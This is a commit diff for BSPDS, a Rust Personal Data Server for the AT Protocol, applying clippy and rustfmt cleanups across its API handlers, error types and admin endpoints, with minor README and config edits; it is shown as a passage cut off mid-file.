this repo has no description

Cargo clippy typeshit

lewis 68715119 61e33ca7

Changed files
+5087 -3063
docs
src
tests
+1 -1
.env.example
··· 53 53 # Appview URL for proxying app.bsky.* requests 54 54 # APPVIEW_URL=https://api.bsky.app 55 55 # Comma-separated list of relay URLs to notify via requestCrawl 56 - # CRAWLERS=https://bsky.network 56 + # CRAWLERS=https://bsky.network,https://relay.upcloud.world 57 57 # ============================================================================= 58 58 # Firehose (subscribeRepos WebSocket) 59 59 # =============================================================================
+25 -10
README.md
··· 1 1 # BSPDS 2 - A production-grade Personal Data Server (PDS) for the AT Protocol. Drop-in replacement for Bluesky's reference PDS, using postgres and s3-compatible blob storage. 2 + 3 + A production-grade Personal Data Server (PDS) for the AT Protocol. Drop-in replacement for Bluesky's reference PDS, written in rust with postgres and s3-compatible blob storage. 4 + 3 5 ## Features 6 + 4 7 - Full AT Protocol support (`com.atproto.*` endpoints) 5 8 - OAuth 2.1 provider (PKCE, DPoP, PAR) 6 9 - WebSocket firehose (`subscribeRepos`) 7 10 - Multi-channel notifications (email, discord, telegram, signal) 8 11 - Built-in web UI for account management 9 12 - Per-IP rate limiting 13 + 10 14 ## Quick Start 15 + 11 16 ```bash 12 17 cp .env.example .env 13 18 podman compose up -d 14 19 just run 15 20 ``` 21 + 16 22 ## Configuration 23 + 17 24 See `.env.example` for all configuration options. 25 + 18 26 ## Development 27 + 19 28 Run `just` to see available commands. 29 + 20 30 ```bash 21 - just test # run tests 22 - just lint # clippy + fmt 31 + just test 32 + just lint 23 33 ``` 34 + 24 35 ## Production Deployment 36 + 25 37 ### Quick Deploy (Docker/Podman Compose) 38 + 39 + Edit `.env.prod` with your values. Generate secrets with `openssl rand -base64 48`. 40 + 26 41 ```bash 27 42 cp .env.prod.example .env.prod 28 - # Edit .env.prod with your values (generate secrets with: openssl rand -base64 48) 29 43 podman-compose -f docker-compose.prod.yml up -d 30 44 ``` 31 - ### Full Installation Guides 45 + 46 + ### Installation Guides 47 + 32 48 | Guide | Best For | 33 49 |-------|----------| 34 - | **Native Installation** | Maximum performance, full control | 35 50 | [Debian](docs/install-debian.md) | Debian 13+ with systemd | 36 51 | [Alpine](docs/install-alpine.md) | Alpine 3.23+ with OpenRC | 37 52 | [OpenBSD](docs/install-openbsd.md) | OpenBSD 7.8+ with rc.d | 38 - | **Containerized** | Easier updates, isolation | 39 - | [Containers](docs/install-containers.md) | Podman with quadlets (Debian) or OpenRC (Alpine) | 40 - | **Orchestrated** | High availability, auto-scaling | 41 - | [Kubernetes](docs/install-kubernetes.md) | Multi-node k8s cluster deployment | 53 + | [Containers](docs/install-containers.md) | Podman with quadlets or OpenRC | 54 + | [Kubernetes](docs/install-kubernetes.md) | You know what you're doing | 55 + 42 56 ## License 57 + 43 58 TBD
+1 -1
docs/install-kubernetes.md
··· 7 7 - s3-compatible object storage (minio operator, or just use a managed service) 8 8 - the app itself (it's just a container with some env vars) 9 9 10 - You'll need a wildcard TLS certificate for `*.your-pds-hostname.example.com` — user handles are served as subdomains. 10 + You'll need a wildcard TLS certificate for `*.your-pds-hostname.example.com`. User handles are served as subdomains. 11 11 12 12 The container image expects: 13 13 - `DATABASE_URL` - postgres connection string
+5 -4
src/api/actor/preferences.rs
··· 1 1 use crate::state::AppState; 2 2 use axum::{ 3 + Json, 3 4 extract::State, 4 5 http::StatusCode, 5 6 response::{IntoResponse, Response}, 6 - Json, 7 7 }; 8 8 use serde::{Deserialize, Serialize}; 9 - use serde_json::{json, Value}; 9 + use serde_json::{Value, json}; 10 10 11 11 const APP_BSKY_NAMESPACE: &str = "app.bsky"; 12 12 const MAX_PREFERENCES_COUNT: usize = 100; ··· 75 75 let preferences: Vec<Value> = prefs 76 76 .into_iter() 77 77 .filter(|row| { 78 - row.name == APP_BSKY_NAMESPACE || row.name.starts_with(&format!("{}.", APP_BSKY_NAMESPACE)) 78 + row.name == APP_BSKY_NAMESPACE 79 + || row.name.starts_with(&format!("{}.", APP_BSKY_NAMESPACE)) 79 80 }) 80 81 .filter_map(|row| { 81 82 if row.name == "app.bsky.actor.defs#declaredAgePref" { ··· 221 222 .into_response(); 222 223 } 223 224 } 224 - if let Err(_) = tx.commit().await { 225 + if tx.commit().await.is_err() { 225 226 return ( 226 227 StatusCode::INTERNAL_SERVER_ERROR, 227 228 Json(json!({"error": "InternalError", "message": "Failed to commit transaction"})),
+71 -24
src/api/actor/profile.rs
··· 1 + use crate::api::proxy_client::proxy_client; 1 2 use crate::state::AppState; 2 3 use axum::{ 4 + Json, 3 5 extract::{Query, State}, 4 6 http::StatusCode, 5 7 response::{IntoResponse, Response}, 6 - Json, 7 8 }; 8 9 use jacquard_repo::storage::BlockStore; 9 - use crate::api::proxy_client::proxy_client; 10 10 use serde::{Deserialize, Serialize}; 11 - use serde_json::{json, Value}; 11 + use serde_json::{Value, json}; 12 12 use std::collections::HashMap; 13 13 use tracing::{error, info}; 14 14 ··· 79 79 let appview_url = match std::env::var("APPVIEW_URL") { 80 80 Ok(url) => url, 81 81 Err(_) => { 82 - return Err( 83 - (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "No upstream AppView configured"}))).into_response() 84 - ); 82 + return Err(( 83 + StatusCode::BAD_GATEWAY, 84 + Json( 85 + json!({"error": "UpstreamError", "message": "No upstream AppView configured"}), 86 + ), 87 + ) 88 + .into_response()); 85 89 } 86 90 }; 87 91 let target_url = format!("{}/xrpc/{}", appview_url, method); ··· 89 93 let client = proxy_client(); 90 94 let mut request_builder = client.get(&target_url).query(params); 91 95 if let Some(key_bytes) = auth_key_bytes { 92 - let appview_did = std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 96 + let appview_did = 97 + std::env::var("APPVIEW_DID").unwrap_or_else(|_| "did:web:api.bsky.app".to_string()); 93 98 match crate::auth::create_service_token(auth_did, &appview_did, method, key_bytes) { 94 99 Ok(service_token) => { 95 - request_builder = request_builder.header("Authorization", format!("Bearer {}", service_token)); 100 + request_builder = 101 + request_builder.header("Authorization", format!("Bearer {}", service_token)); 96 102 } 97 103 Err(e) => { 98 104 error!("Failed to create service token: {:?}", e); 99 - return Err((StatusCode::INTERNAL_SERVER_ERROR, Json(json!({"error": "InternalError"}))).into_response()); 105 + return Err(( 106 + StatusCode::INTERNAL_SERVER_ERROR, 107 + Json(json!({"error": "InternalError"})), 108 + ) 109 + .into_response()); 100 110 } 101 111 } 102 112 } 103 113 match request_builder.send().await { 104 114 Ok(resp) => { 105 - let status = StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 115 + let status = 116 + StatusCode::from_u16(resp.status().as_u16()).unwrap_or(StatusCode::BAD_GATEWAY); 106 117 match resp.json::<Value>().await { 107 118 Ok(body) => Ok((status, body)), 108 119 Err(e) => { 109 120 error!("Error parsing proxy response: {:?}", e); 110 - Err((StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()) 121 + Err(( 122 + StatusCode::BAD_GATEWAY, 123 + Json(json!({"error": "UpstreamError"})), 124 + ) 125 + .into_response()) 111 126 } 112 127 } 113 128 } 114 129 Err(e) => { 115 130 error!("Error sending proxy request: {:?}", e); 116 131 if e.is_timeout() { 117 - Err((StatusCode::GATEWAY_TIMEOUT, Json(json!({"error": "UpstreamTimeout"}))).into_response()) 132 + Err(( 133 + StatusCode::GATEWAY_TIMEOUT, 134 + Json(json!({"error": "UpstreamTimeout"})), 135 + ) 136 + .into_response()) 118 137 } else { 119 - Err((StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError"}))).into_response()) 138 + Err(( 139 + StatusCode::BAD_GATEWAY, 140 + Json(json!({"error": "UpstreamError"})), 141 + ) 142 + .into_response()) 120 143 } 121 144 } 122 145 } ··· 130 153 let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 131 154 let auth_user = if let Some(h) = auth_header { 132 155 if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 133 - crate::auth::validate_bearer_token(&state.db, &token).await.ok() 156 + crate::auth::validate_bearer_token(&state.db, &token) 157 + .await 158 + .ok() 134 159 } else { 135 160 None 136 161 } ··· 141 166 let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 142 167 let mut query_params = HashMap::new(); 143 168 query_params.insert("actor".to_string(), params.actor.clone()); 144 - let (status, body) = match proxy_to_appview("app.bsky.actor.getProfile", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await { 169 + let (status, body) = match proxy_to_appview( 170 + "app.bsky.actor.getProfile", 171 + &query_params, 172 + auth_did.as_deref().unwrap_or(""), 173 + auth_key_bytes.as_deref(), 174 + ) 175 + .await 176 + { 145 177 Ok(r) => r, 146 178 Err(e) => return e, 147 179 }; ··· 151 183 let mut profile: ProfileViewDetailed = match serde_json::from_value(body) { 152 184 Ok(p) => p, 153 185 Err(_) => { 154 - return (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "Invalid profile response"}))).into_response(); 186 + return ( 187 + StatusCode::BAD_GATEWAY, 188 + Json(json!({"error": "UpstreamError", "message": "Invalid profile response"})), 189 + ) 190 + .into_response(); 155 191 } 156 192 }; 157 - if let Some(ref did) = auth_did { 158 - if profile.did == *did { 159 - if let Some(local_record) = get_local_profile_record(&state, did).await { 193 + if let Some(ref did) = auth_did 194 + && profile.did == *did 195 + && let Some(local_record) = get_local_profile_record(&state, did).await { 160 196 munge_profile_with_local(&mut profile, &local_record); 161 197 } 162 - } 163 - } 164 198 (StatusCode::OK, Json(profile)).into_response() 165 199 } 166 200 ··· 172 206 let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 173 207 let auth_user = if let Some(h) = auth_header { 174 208 if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 175 - crate::auth::validate_bearer_token(&state.db, &token).await.ok() 209 + crate::auth::validate_bearer_token(&state.db, &token) 210 + .await 211 + .ok() 176 212 } else { 177 213 None 178 214 } ··· 183 219 let auth_key_bytes = auth_user.as_ref().and_then(|u| u.key_bytes.clone()); 184 220 let mut query_params = HashMap::new(); 185 221 query_params.insert("actors".to_string(), params.actors.clone()); 186 - let (status, body) = match proxy_to_appview("app.bsky.actor.getProfiles", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await { 222 + let (status, body) = match proxy_to_appview( 223 + "app.bsky.actor.getProfiles", 224 + &query_params, 225 + auth_did.as_deref().unwrap_or(""), 226 + auth_key_bytes.as_deref(), 227 + ) 228 + .await 229 + { 187 230 Ok(r) => r, 188 231 Err(e) => return e, 189 232 }; ··· 193 236 let mut output: GetProfilesOutput = match serde_json::from_value(body) { 194 237 Ok(p) => p, 195 238 Err(_) => { 196 - return (StatusCode::BAD_GATEWAY, Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"}))).into_response(); 239 + return ( 240 + StatusCode::BAD_GATEWAY, 241 + Json(json!({"error": "UpstreamError", "message": "Invalid profiles response"})), 242 + ) 243 + .into_response(); 197 244 } 198 245 }; 199 246 if let Some(ref did) = auth_did {
+31 -11
src/api/admin/account/delete.rs
··· 121 121 .execute(&mut *tx) 122 122 .await 123 123 { 124 - error!("Failed to delete app passwords for user {}: {:?}", user_id, e); 124 + error!( 125 + "Failed to delete app passwords for user {}: {:?}", 126 + user_id, e 127 + ); 125 128 return ( 126 129 StatusCode::INTERNAL_SERVER_ERROR, 127 130 Json(json!({"error": "InternalError", "message": "Failed to delete app passwords"})), 128 131 ) 129 132 .into_response(); 130 133 } 131 - if let Err(e) = sqlx::query!("DELETE FROM invite_code_uses WHERE used_by_user = $1", user_id) 132 - .execute(&mut *tx) 133 - .await 134 + if let Err(e) = sqlx::query!( 135 + "DELETE FROM invite_code_uses WHERE used_by_user = $1", 136 + user_id 137 + ) 138 + .execute(&mut *tx) 139 + .await 134 140 { 135 - error!("Failed to delete invite code uses for user {}: {:?}", user_id, e); 141 + error!( 142 + "Failed to delete invite code uses for user {}: {:?}", 143 + user_id, e 144 + ); 136 145 } 137 - if let Err(e) = sqlx::query!("DELETE FROM invite_codes WHERE created_by_user = $1", user_id) 138 - .execute(&mut *tx) 139 - .await 146 + if let Err(e) = sqlx::query!( 147 + "DELETE FROM invite_codes WHERE created_by_user = $1", 148 + user_id 149 + ) 150 + .execute(&mut *tx) 151 + .await 140 152 { 141 - error!("Failed to delete invite codes for user {}: {:?}", user_id, e); 153 + error!( 154 + "Failed to delete invite codes for user {}: {:?}", 155 + user_id, e 156 + ); 142 157 } 143 158 if let Err(e) = sqlx::query!("DELETE FROM user_keys WHERE user_id = $1", user_id) 144 159 .execute(&mut *tx) ··· 170 185 ) 171 186 .into_response(); 172 187 } 173 - if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, false, Some("deleted")).await { 174 - warn!("Failed to sequence account deletion event for {}: {}", did, e); 188 + if let Err(e) = 189 + crate::api::repo::record::sequence_account_event(&state, did, false, Some("deleted")).await 190 + { 191 + warn!( 192 + "Failed to sequence account deletion event for {}: {}", 193 + did, e 194 + ); 175 195 } 176 196 let _ = state.cache.delete(&format!("handle:{}", handle)).await; 177 197 (StatusCode::OK, Json(json!({}))).into_response()
+1 -5
src/api/admin/account/email.rs
··· 104 104 let result = crate::notifications::enqueue_notification(&state.db, notification).await; 105 105 match result { 106 106 Ok(_) => { 107 - tracing::info!( 108 - "Admin email queued for {} ({})", 109 - handle, 110 - recipient_did 111 - ); 107 + tracing::info!("Admin email queued for {} ({})", handle, recipient_did); 112 108 (StatusCode::OK, Json(SendEmailOutput { sent: true })).into_response() 113 109 } 114 110 Err(e) => {
+14 -16
src/api/admin/account/info.rs
··· 65 65 .fetch_optional(&state.db) 66 66 .await; 67 67 match result { 68 - Ok(Some(row)) => { 69 - ( 70 - StatusCode::OK, 71 - Json(AccountInfo { 72 - did: row.did, 73 - handle: row.handle, 74 - email: row.email, 75 - indexed_at: row.created_at.to_rfc3339(), 76 - invite_note: None, 77 - invites_disabled: false, 78 - email_confirmed_at: None, 79 - deactivated_at: None, 80 - }), 81 - ) 82 - .into_response() 83 - } 68 + Ok(Some(row)) => ( 69 + StatusCode::OK, 70 + Json(AccountInfo { 71 + did: row.did, 72 + handle: row.handle, 73 + email: row.email, 74 + indexed_at: row.created_at.to_rfc3339(), 75 + invite_note: None, 76 + invites_disabled: false, 77 + email_confirmed_at: None, 78 + deactivated_at: None, 79 + }), 80 + ) 81 + .into_response(), 84 82 Ok(None) => ( 85 83 StatusCode::NOT_FOUND, 86 84 Json(json!({"error": "AccountNotFound", "message": "Account not found"})),
+10 -7
src/api/admin/account/mod.rs
··· 4 4 mod profile; 5 5 mod update; 6 6 7 - pub use delete::{delete_account, DeleteAccountInput}; 8 - pub use email::{send_email, SendEmailInput, SendEmailOutput}; 7 + pub use delete::{DeleteAccountInput, delete_account}; 8 + pub use email::{SendEmailInput, SendEmailOutput, send_email}; 9 9 pub use info::{ 10 - get_account_info, get_account_infos, AccountInfo, GetAccountInfoParams, GetAccountInfosOutput, 11 - GetAccountInfosParams, 10 + AccountInfo, GetAccountInfoParams, GetAccountInfosOutput, GetAccountInfosParams, 11 + get_account_info, get_account_infos, 12 + }; 13 + pub use profile::{ 14 + CreateProfileInput, CreateProfileOutput, CreateRecordAdminInput, create_profile, 15 + create_record_admin, 12 16 }; 13 - pub use profile::{create_profile, create_record_admin, CreateProfileInput, CreateProfileOutput, CreateRecordAdminInput}; 14 17 pub use update::{ 15 - update_account_email, update_account_handle, update_account_password, UpdateAccountEmailInput, 16 - UpdateAccountHandleInput, UpdateAccountPasswordInput, 18 + UpdateAccountEmailInput, UpdateAccountHandleInput, UpdateAccountPasswordInput, 19 + update_account_email, update_account_handle, update_account_password, 17 20 };
+7 -11
src/api/admin/account/profile.rs
··· 74 74 "app.bsky.actor.profile", 75 75 "self", 76 76 &profile_record, 77 - ).await { 77 + ) 78 + .await 79 + { 78 80 Ok((uri, commit_cid)) => { 79 81 info!(did = %did, uri = %uri, "Created profile for user"); 80 82 ( ··· 120 122 .into_response(); 121 123 } 122 124 123 - let rkey = input.rkey.unwrap_or_else(|| { 124 - chrono::Utc::now().format("%Y%m%d%H%M%S%f").to_string() 125 - }); 125 + let rkey = input 126 + .rkey 127 + .unwrap_or_else(|| chrono::Utc::now().format("%Y%m%d%H%M%S%f").to_string()); 126 128 127 - match create_record_internal( 128 - &state, 129 - did, 130 - &input.collection, 131 - &rkey, 132 - &input.record, 133 - ).await { 129 + match create_record_internal(&state, did, &input.collection, &rkey, &input.record).await { 134 130 Ok((uri, commit_cid)) => { 135 131 info!(did = %did, uri = %uri, "Admin created record"); 136 132 (
+17 -7
src/api/admin/account/update.rs
··· 96 96 { 97 97 return ( 98 98 StatusCode::BAD_REQUEST, 99 - Json(json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"})), 99 + Json( 100 + json!({"error": "InvalidHandle", "message": "Handle contains invalid characters"}), 101 + ), 100 102 ) 101 103 .into_response(); 102 104 } ··· 105 107 .await 106 108 .ok() 107 109 .flatten(); 108 - let existing = sqlx::query!("SELECT id FROM users WHERE handle = $1 AND did != $2", handle, did) 109 - .fetch_optional(&state.db) 110 - .await; 110 + let existing = sqlx::query!( 111 + "SELECT id FROM users WHERE handle = $1 AND did != $2", 112 + handle, 113 + did 114 + ) 115 + .fetch_optional(&state.db) 116 + .await; 111 117 if let Ok(Some(_)) = existing { 112 118 return ( 113 119 StatusCode::BAD_REQUEST, ··· 183 189 .into_response(); 184 190 } 185 191 }; 186 - let result = sqlx::query!("UPDATE users SET password_hash = $1 WHERE did = $2", password_hash, did) 187 - .execute(&state.db) 188 - .await; 192 + let result = sqlx::query!( 193 + "UPDATE users SET password_hash = $1 WHERE did = $2", 194 + password_hash, 195 + did 196 + ) 197 + .execute(&state.db) 198 + .await; 189 199 match result { 190 200 Ok(r) => { 191 201 if r.rows_affected() == 0 {
+45 -17
src/api/admin/invite.rs
··· 31 31 } 32 32 if let Some(codes) = &input.codes { 33 33 for code in codes { 34 - let _ = sqlx::query!("UPDATE invite_codes SET disabled = TRUE WHERE code = $1", code) 35 - .execute(&state.db) 36 - .await; 34 + let _ = sqlx::query!( 35 + "UPDATE invite_codes SET disabled = TRUE WHERE code = $1", 36 + code 37 + ) 38 + .execute(&state.db) 39 + .await; 37 40 } 38 41 } 39 42 if let Some(accounts) = &input.accounts { ··· 106 109 _ => "created_at DESC", 107 110 }; 108 111 let codes_result = if let Some(cursor) = &params.cursor { 109 - sqlx::query_as::<_, (String, i32, Option<bool>, uuid::Uuid, chrono::DateTime<chrono::Utc>)>(&format!( 112 + sqlx::query_as::< 113 + _, 114 + ( 115 + String, 116 + i32, 117 + Option<bool>, 118 + uuid::Uuid, 119 + chrono::DateTime<chrono::Utc>, 120 + ), 121 + >(&format!( 110 122 r#" 111 123 SELECT ic.code, ic.available_uses, ic.disabled, ic.created_by_user, ic.created_at 112 124 FROM invite_codes ic ··· 121 133 .fetch_all(&state.db) 122 134 .await 123 135 } else { 124 - sqlx::query_as::<_, (String, i32, Option<bool>, uuid::Uuid, chrono::DateTime<chrono::Utc>)>(&format!( 136 + sqlx::query_as::< 137 + _, 138 + ( 139 + String, 140 + i32, 141 + Option<bool>, 142 + uuid::Uuid, 143 + chrono::DateTime<chrono::Utc>, 144 + ), 145 + >(&format!( 125 146 r#" 126 147 SELECT ic.code, ic.available_uses, ic.disabled, ic.created_by_user, ic.created_at 127 148 FROM invite_codes ic ··· 147 168 }; 148 169 let mut codes = Vec::new(); 149 170 for (code, available_uses, disabled, created_by_user, created_at) in &codes_rows { 150 - let creator_did = sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", created_by_user) 151 - .fetch_optional(&state.db) 152 - .await 153 - .ok() 154 - .flatten() 155 - .unwrap_or_else(|| "unknown".to_string()); 171 + let creator_did = 172 + sqlx::query_scalar!("SELECT did FROM users WHERE id = $1", created_by_user) 173 + .fetch_optional(&state.db) 174 + .await 175 + .ok() 176 + .flatten() 177 + .unwrap_or_else(|| "unknown".to_string()); 156 178 let uses_result = sqlx::query!( 157 179 r#" 158 180 SELECT u.did, icu.used_at ··· 226 248 ) 227 249 .into_response(); 228 250 } 229 - let result = sqlx::query!("UPDATE users SET invites_disabled = TRUE WHERE did = $1", account) 230 - .execute(&state.db) 231 - .await; 251 + let result = sqlx::query!( 252 + "UPDATE users SET invites_disabled = TRUE WHERE did = $1", 253 + account 254 + ) 255 + .execute(&state.db) 256 + .await; 232 257 match result { 233 258 Ok(r) => { 234 259 if r.rows_affected() == 0 { ··· 277 302 ) 278 303 .into_response(); 279 304 } 280 - let result = sqlx::query!("UPDATE users SET invites_disabled = FALSE WHERE did = $1", account) 281 - .execute(&state.db) 282 - .await; 305 + let result = sqlx::query!( 306 + "UPDATE users SET invites_disabled = FALSE WHERE did = $1", 307 + account 308 + ) 309 + .execute(&state.db) 310 + .await; 283 311 match result { 284 312 Ok(r) => { 285 313 if r.rows_affected() == 0 {
+47 -18
src/api/admin/status.rs
··· 142 142 } 143 143 } 144 144 if let Some(blob_cid) = &params.blob { 145 - let blob = sqlx::query!("SELECT cid, takedown_ref FROM blobs WHERE cid = $1", blob_cid) 146 - .fetch_optional(&state.db) 147 - .await; 145 + let blob = sqlx::query!( 146 + "SELECT cid, takedown_ref FROM blobs WHERE cid = $1", 147 + blob_cid 148 + ) 149 + .fetch_optional(&state.db) 150 + .await; 148 151 match blob { 149 152 Ok(Some(row)) => { 150 153 let takedown = row.takedown_ref.as_ref().map(|r| StatusAttr { ··· 263 266 .execute(&mut *tx) 264 267 .await 265 268 } else { 266 - sqlx::query!( 267 - "UPDATE users SET deactivated_at = NULL WHERE did = $1", 268 - did 269 - ) 270 - .execute(&mut *tx) 271 - .await 269 + sqlx::query!("UPDATE users SET deactivated_at = NULL WHERE did = $1", did) 270 + .execute(&mut *tx) 271 + .await 272 272 }; 273 273 if let Err(e) = result { 274 - error!("Failed to update user deactivation status for {}: {:?}", did, e); 274 + error!( 275 + "Failed to update user deactivation status for {}: {:?}", 276 + did, e 277 + ); 275 278 return ( 276 279 StatusCode::INTERNAL_SERVER_ERROR, 277 280 Json(json!({"error": "InternalError", "message": "Failed to update deactivation status"})), ··· 288 291 .into_response(); 289 292 } 290 293 if let Some(takedown) = &input.takedown { 291 - let status = if takedown.apply { Some("takendown") } else { None }; 292 - if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, !takedown.apply, status).await { 294 + let status = if takedown.apply { 295 + Some("takendown") 296 + } else { 297 + None 298 + }; 299 + if let Err(e) = crate::api::repo::record::sequence_account_event( 300 + &state, 301 + did, 302 + !takedown.apply, 303 + status, 304 + ) 305 + .await 306 + { 293 307 warn!("Failed to sequence account event for takedown: {}", e); 294 308 } 295 309 } 296 310 if let Some(deactivated) = &input.deactivated { 297 - let status = if deactivated.apply { Some("deactivated") } else { None }; 298 - if let Err(e) = crate::api::repo::record::sequence_account_event(&state, did, !deactivated.apply, status).await { 311 + let status = if deactivated.apply { 312 + Some("deactivated") 313 + } else { 314 + None 315 + }; 316 + if let Err(e) = crate::api::repo::record::sequence_account_event( 317 + &state, 318 + did, 319 + !deactivated.apply, 320 + status, 321 + ) 322 + .await 323 + { 299 324 warn!("Failed to sequence account event for deactivation: {}", e); 300 325 } 301 326 } 302 - if let Ok(Some(handle)) = sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 303 - .fetch_optional(&state.db) 304 - .await 327 + if let Ok(Some(handle)) = 328 + sqlx::query_scalar!("SELECT handle FROM users WHERE did = $1", did) 329 + .fetch_optional(&state.db) 330 + .await 305 331 { 306 332 let _ = state.cache.delete(&format!("handle:{}", handle)).await; 307 333 } ··· 338 364 .execute(&state.db) 339 365 .await 340 366 { 341 - error!("Failed to update record takedown status for {}: {:?}", uri, e); 367 + error!( 368 + "Failed to update record takedown status for {}: {:?}", 369 + uri, e 370 + ); 342 371 return ( 343 372 StatusCode::INTERNAL_SERVER_ERROR, 344 373 Json(json!({"error": "InternalError", "message": "Failed to update takedown status"})),
+24 -9
src/api/error.rs
··· 46 46 UpstreamFailure, 47 47 UpstreamTimeout, 48 48 UpstreamUnavailable(String), 49 - UpstreamError { status: u16, error: Option<String>, message: Option<String> }, 49 + UpstreamError { 50 + status: u16, 51 + error: Option<String>, 52 + message: Option<String>, 53 + }, 50 54 } 51 55 52 56 impl ApiError { ··· 135 139 _ => None, 136 140 } 137 141 } 138 - pub fn from_upstream_response( 139 - status: u16, 140 - body: &[u8], 141 - ) -> Self { 142 + pub fn from_upstream_response(status: u16, body: &[u8]) -> Self { 142 143 if let Ok(parsed) = serde_json::from_slice::<serde_json::Value>(body) { 143 - let error = parsed.get("error").and_then(|v| v.as_str()).map(String::from); 144 - let message = parsed.get("message").and_then(|v| v.as_str()).map(String::from); 145 - return Self::UpstreamError { status, error, message }; 144 + let error = parsed 145 + .get("error") 146 + .and_then(|v| v.as_str()) 147 + .map(String::from); 148 + let message = parsed 149 + .get("message") 150 + .and_then(|v| v.as_str()) 151 + .map(String::from); 152 + return Self::UpstreamError { 153 + status, 154 + error, 155 + message, 156 + }; 157 + } 158 + Self::UpstreamError { 159 + status, 160 + error: None, 161 + message: None, 146 162 } 147 - Self::UpstreamError { status, error: None, message: None } 148 163 } 149 164 } 150 165
+17 -9
src/api/feed/actor_likes.rs
··· 1 1 use crate::api::read_after_write::{ 2 - extract_repo_rev, format_munged_response, get_local_lag, get_records_since_rev, 3 - proxy_to_appview, FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, 2 + FeedOutput, FeedViewPost, LikeRecord, PostView, RecordDescript, extract_repo_rev, 3 + format_munged_response, get_local_lag, get_records_since_rev, proxy_to_appview, 4 4 }; 5 5 use crate::state::AppState; 6 6 use axum::{ 7 + Json, 7 8 extract::{Query, State}, 8 9 http::StatusCode, 9 10 response::{IntoResponse, Response}, 10 - Json, 11 11 }; 12 12 use serde::Deserialize; 13 13 use serde_json::Value; ··· 68 68 let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 69 69 let auth_user = if let Some(h) = auth_header { 70 70 if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 71 - crate::auth::validate_bearer_token(&state.db, &token).await.ok() 71 + crate::auth::validate_bearer_token(&state.db, &token) 72 + .await 73 + .ok() 72 74 } else { 73 75 None 74 76 } ··· 85 87 if let Some(cursor) = &params.cursor { 86 88 query_params.insert("cursor".to_string(), cursor.clone()); 87 89 } 88 - let proxy_result = 89 - match proxy_to_appview("app.bsky.feed.getActorLikes", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await { 90 - Ok(r) => r, 91 - Err(e) => return e, 92 - }; 90 + let proxy_result = match proxy_to_appview( 91 + "app.bsky.feed.getActorLikes", 92 + &query_params, 93 + auth_did.as_deref().unwrap_or(""), 94 + auth_key_bytes.as_deref(), 95 + ) 96 + .await 97 + { 98 + Ok(r) => r, 99 + Err(e) => return e, 100 + }; 93 101 if !proxy_result.status.is_success() { 94 102 return proxy_result.into_response(); 95 103 }
+21 -21
src/api/feed/author_feed.rs
··· 1 1 use crate::api::read_after_write::{ 2 - extract_repo_rev, format_local_post, format_munged_response, get_local_lag, 3 - get_records_since_rev, insert_posts_into_feed, proxy_to_appview, FeedOutput, FeedViewPost, 4 - ProfileRecord, RecordDescript, 2 + FeedOutput, FeedViewPost, ProfileRecord, RecordDescript, extract_repo_rev, format_local_post, 3 + format_munged_response, get_local_lag, get_records_since_rev, insert_posts_into_feed, 4 + proxy_to_appview, 5 5 }; 6 6 use crate::state::AppState; 7 7 use axum::{ 8 + Json, 8 9 extract::{Query, State}, 9 10 http::StatusCode, 10 11 response::{IntoResponse, Response}, 11 - Json, 12 12 }; 13 13 use serde::Deserialize; 14 14 use std::collections::HashMap; ··· 30 30 local_profile: &RecordDescript<ProfileRecord>, 31 31 ) { 32 32 for item in feed.iter_mut() { 33 - if item.post.author.did == author_did { 34 - if let Some(ref display_name) = local_profile.record.display_name { 33 + if item.post.author.did == author_did 34 + && let Some(ref display_name) = local_profile.record.display_name { 35 35 item.post.author.display_name = Some(display_name.clone()); 36 36 } 37 - } 38 37 } 39 38 } 40 39 ··· 46 45 let auth_header = headers.get("Authorization").and_then(|h| h.to_str().ok()); 47 46 let auth_user = if let Some(h) = auth_header { 48 47 if let Some(token) = crate::auth::extract_bearer_token_from_header(Some(h)) { 49 - crate::auth::validate_bearer_token(&state.db, &token).await.ok() 48 + crate::auth::validate_bearer_token(&state.db, &token) 49 + .await 50 + .ok() 50 51 } else { 51 52 None 52 53 } ··· 69 70 if let Some(include_pins) = params.include_pins { 70 71 query_params.insert("includePins".to_string(), include_pins.to_string()); 71 72 } 72 - let proxy_result = 73 - match proxy_to_appview("app.bsky.feed.getAuthorFeed", &query_params, auth_did.as_deref().unwrap_or(""), auth_key_bytes.as_deref()).await { 74 - Ok(r) => r, 75 - Err(e) => return e, 76 - }; 73 + let proxy_result = match proxy_to_appview( 74 + "app.bsky.feed.getAuthorFeed", 75 + &query_params, 76 + auth_did.as_deref().unwrap_or(""), 77 + auth_key_bytes.as_deref(), 78 + ) 79 + .await 80 + { 81 + Ok(r) => r, 82 + Err(e) => return e, 83 + }; 77 84 if !proxy_result.status.is_success() { 78 85 return proxy_result.into_response(); 79 86 } ··· 144 151 let local_posts: Vec<_> = local_records 145 152 .posts 146 153 .iter() 147 - .map(|p| { 148 - format_local_post( 149 - p, 150 - &requester_did, 151 - &handle, 152 - local_records.profile.as_ref(), 153 - ) 154 - }) 154 + .map(|p| format_local_post(p, &requester_did, &handle, local_records.profile.as_ref())) 155 155 .collect(); 156 156 insert_posts_into_feed(&mut feed_output.feed, local_posts); 157 157 let 